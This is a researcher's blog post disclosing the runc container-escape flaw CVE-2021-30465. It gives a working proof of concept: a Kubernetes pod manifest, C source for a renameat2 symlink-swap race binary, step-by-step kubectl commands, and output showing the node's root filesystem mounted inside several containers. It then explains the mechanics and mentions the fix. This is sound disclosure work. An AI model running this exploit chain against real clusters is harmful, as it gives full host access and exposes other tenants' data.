blog.champtar.fr

View on GitHub

runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)

It’s November 2020 and I’m troubleshooting a container running on K8S that is doing tons of writes to the local disk. As those writes are just temporary states, I quickly add an emptyDir tmpfs volume at /var/run, open a ticket so that my devs make it permanent, and call it a day.

Some time later I notice, looking at mount output, that this new tmpfs is mounted at /run instead of /var/run, which I missed earlier but surprises me a bit. /var/run is a symlink to ../run and after a quick test this is actually the normal Linux behavior to have mount follow symlinks, so I start wondering how does containerd/runc make sure the mounts are inside the container rootfs.

After following the code responsible for the mounts, I end up reading the comment of securejoin.SecureJoinVFS():

// Note that the guarantees provided by this function only apply if the path
// components in the returned string are not modified (in other words are not
// replaced with symlinks on the filesystem) after this function has returned.
// Such a symlink race is necessarily out-of-scope of SecureJoin.

As you read this you know that this race condition exists, the question is how to exploit it to escape to the K8S host.

POC

When mounting a volume, runc trusts the source, and will let the kernel follow symlinks, but it doesn’t trust the target argument and will use ‘filepath-securejoin’ library to resolve any symlink and ensure the resolved target stays inside the container root. As explained in SecureJoinVFS() documentation, using this function is only safe if you know that the checked file is not going to be replaced by a symlink, the problem is that we can replace it by a symlink. In K8S there is a trivial way to control the target, create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non existing images so they don’t start right away.

Let’s start with the POC first and the explanations after

  1. Create our attack POD

    kubectl create -f - <<EOF
    apiVersion: v1
    kind: Pod
    metadata:
        name: attack
    spec:
        terminationGracePeriodSeconds: 1
        containers:
        - name: c1
        image: ubuntu:latest
        command: [ "/bin/sleep", "inf" ]
        env:
        - name: MY_POD_UID
            valueFrom:
            fieldRef:
                fieldPath: metadata.uid
        volumeMounts:
        - name: test1
            mountPath: /test1
        - name: test2
            mountPath: /test2
    $(for c in {2..20}; do
    cat <<EOC
        - name: c$c
        image: donotexists.com/do/not:exist
        command: [ "/bin/sleep", "inf" ]
        volumeMounts:
        - name: test1
            mountPath: /test1
    $(for m in {1..4}; do
    cat <<EOM
        - name: test2
            mountPath: /test1/mnt$m
    EOM
    done
    )
        - name: test2
            mountPath: /test1/zzz
    EOC
    done
    )
        volumes:
        - name: test1
        emptyDir:
            medium: "Memory"
        - name: test2
        emptyDir:
            medium: "Memory"
    EOF
    
  2. Compile race.c (simple binary running renameat2(dir,symlink,RENAME_EXCHANGE))

    cat > race.c <<'EOF'
    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <unistd.h>
    #include <sys/syscall.h>
    
    int main(int argc, char *argv[]) {
        if (argc != 4) {
            fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
            exit(EXIT_FAILURE);
        }
        char *name1 = argv[1];
        char *name2 = argv[2];
        char *linkdest = argv[3];
    
        int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
        if (dirfd < 0) {
            perror("Error open CWD");
            exit(EXIT_FAILURE);
        }
    
        if (mkdir(name1, 0755) < 0) {
            perror("mkdir failed");
            //do not exit
        }
        if (symlink(linkdest, name2) < 0) {
            perror("symlink failed");
            //do not exit
        }
    
        while (1)
        {
            renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
        }
    }
    EOF
    
    gcc race.c -O3 -o race
    
  3. Wait for the container c1 to start, upload the ‘race’ binary to it, and exec bash

    sleep 30 # wait for the first container to start
    kubectl cp race -c c1 attack:/test1/
    kubectl exec -ti pod/attack -c c1 -- bash
    

    you now have a shell in container c1

  4. Create the following symlink (explanations later)

    ln -s / /test2/test2
    
  5. Launch ‘race’ multiple times to try to exploit this TOCTOU

    cd test1
    seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
    
  6. Now that everything is ready, in a second shell, update the images so that the other containers can start

    for c in {2..20}; do
      kubectl set image pod attack c$c=ubuntu:latest
    done
    
  7. Wait a bit and look at the results

    for c in {2..20}; do
      echo ~~ Container c$c ~~
      kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
    done
    
    ~~ Container c2 ~~
    test2
    ~~ Container c3 ~~
    test2
    ~~ Container c4 ~~
    test2
    ~~ Container c5 ~~
    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
    boot  etc  lib lost+found  opt  proc    run   sys usr
    ~~ Container c6 ~~
    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
    boot  etc  lib lost+found  opt  proc    run   sys usr
    ~~ Container c7 ~~
    error: unable to upgrade connection: container not found ("c7")
    ~~ Container c8 ~~
    test2
    ~~ Container c9 ~~
    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
    ~~ Container c10 ~~
    test2
    ~~ Container c11 ~~
    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
    boot  etc  lib lost+found  opt  proc    run   sys usr
    ~~ Container c12 ~~
    test2
    ~~ Container c13 ~~
    test2
    ~~ Container c14 ~~
    test2
    ~~ Container c15 ~~
    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
    ~~ Container c16 ~~
    error: unable to upgrade connection: container not found ("c16")
    ~~ Container c17 ~~
    error: unable to upgrade connection: container not found ("c17")
    ~~ Container c18 ~~
    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
    ~~ Container c19 ~~
    error: unable to upgrade connection: container not found ("c19")
    ~~ Container c20 ~~
    test2
    

On my first try running this POC, I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected.

Even without the ability to update images, we could use a fast registry for c1 and a slow registry or big container for c2+, we just need c1 to start 1sec before the others.

Tests were done on the following GKE cluster:

gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

Explanations

I haven’t dug too deep in the code and relied on strace to understand what was happening, and did the investigation about a month before finally having a working POC, so details are fuzzy, but here is my understanding:

  1. K8S prepares all the volumes for the pod in /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME (In my POC I’m using the fact that the path is known, but looking at /proc/self/mountinfo leaks all you need to find the path)

  2. containerd prepares the rootfs at /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs

  3. runc calls unshare(CLONE_NEWNS) and sets the mount propagation to MS_SLAVE, thus preventing the following mount operations to affect other containers or the node directly

  4. runc mount bind the K8S volumes

    1. runc call securejoin.SecureJoin() to resolve the destination/target

    2. runc call mount()

K8S doesn’t give us control over the mount source, but we have full control over the target of the mount, so the trick is to mount a directory containing a symlink over K8S volumes path to have the next mount use this new source, and give us access to the node root filesystem.

From the node the filesystem look like this

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
...
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /

Our race binary is constantly swapping mntX and mnt-tmpX, when c2+ start, they do the following mounts

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)

which is equivalent to

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)

as the volume is bind mounted into the container rootfs

If we are lucky, when we call SecureJoin(), mntX is a directory, and when we call mount() mntX is now a symlink, and as mount() follow symlinks, this gives us

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)

The filesystem now looks like

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /

When we do the final mount

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

resolves to

mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :)

Workaround

A possible workaround is to forbid mounting volumes in volumes, but as usual upgrading is recommended.

Comments

This POC is far from being optimal and, as already stated, being able to update the image is not mandatory.

It took me some tries to have a working POC, at first I was trying to just mount the tmpfs volume to impact the host (/root/.ssh), but this doesn’t work as the mounts are happening in a new mount namespace (and with the right mount propagation set), so the mounts are not visible in the host mount namespace. I then tried using a golang version for the race binary, 4 containers and 20 volumes, and this was always failing. I then switched to a C version (not sure it makes a difference), 19 containers and 4 mounts and this worked and gave me 6 containers out of 19 with the host mounted.

Even with newer syscalls like openat2() you still need to mount(/proc/self/fd/X, /proc/self/fd/Y) to be race free, not sure how useful having a new mount flag to fail when one of the params is a symlink would be, but this is a huge footgun.

This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc and was added later by K8S. You can sometimes read that K8S is multi-tenant, but you have to understand it as multiple trusted teams, not as giving API access to strangers.

On February 24th Google introduced GKE Autopilot, fully managed K8S Clusters with an emphasis on security and theoretically no access to the node, so after testing I also reported to them.

Timeline

Acknowledgments

Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.